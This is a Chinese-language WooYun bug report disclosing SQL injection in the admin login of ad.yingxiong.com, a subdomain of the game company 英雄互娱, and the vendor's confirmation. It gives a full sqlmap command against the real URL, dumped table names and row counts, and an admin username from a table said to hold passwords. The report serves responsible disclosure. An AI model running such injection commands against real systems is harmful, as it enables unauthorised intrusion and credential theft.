当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169916

漏洞标题:英雄互娱某二级域名后台SQL注入

相关厂商:英雄互娱

漏洞作者: hecate

提交时间:2016-01-18 17:32

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

疑似中国手游的后台

详细说明:

http://ad.yingxiong.com/site/login
单引号报错

123.png


sqlmap -u "http://ad.yingxiong.com/site/login/error/%E5%AF%86%E7%A0%81%E9%94%99%E8%AF%AF" --data "username=admin&password=admin&submit=%E7%99%BB+%E5%BD%95" --dbs


123.png


Database: app_ad
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| ad_channel_91 | 22038641 |
| ad_channel_jiuyou | 10236316 |
| ad_channel_baidu | 8246076 |
| ad_channel_wandoujia | 7571609 |
| ad_channel_xiaomi | 6624637 |
| ad_channel_91_ios | 4368202 |
| ad_channel_jinliapk | 4149869 |
| ad_channel_xiaomigame | 3159493 |
| ad_channel_360 | 2950168 |
| ad_channel_vivo | 2892705 |
| ad_channel_xy | 2573066 |
| ad_channel_shougouzhush | 2066280 |
| ad_channel_dangle | 1443864 |
| ad_channel_mm | 1163709 |
| ad_channel_4399 | 996131 |
| ad_channel_lianxianggame | 835937 |
| ad_channel_vivogame | 724962 |
| ad_channel_jinligame | 416307 |
| ad_channel_adarea | 236 |
| ad_game_my | 24 |
| ad_channel | 22 |
| ad_members | 3 |
+--------------------------+---------+

漏洞证明:

ad_members表中含管理员密码

chenkexv   admin


222.png

修复方案:

到底是交给中国手游还是英雄互娱啊~

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-19 10:19

厂商回复:

感谢,此后台已经不再维护

最新状态:

暂无


漏洞评价:

评价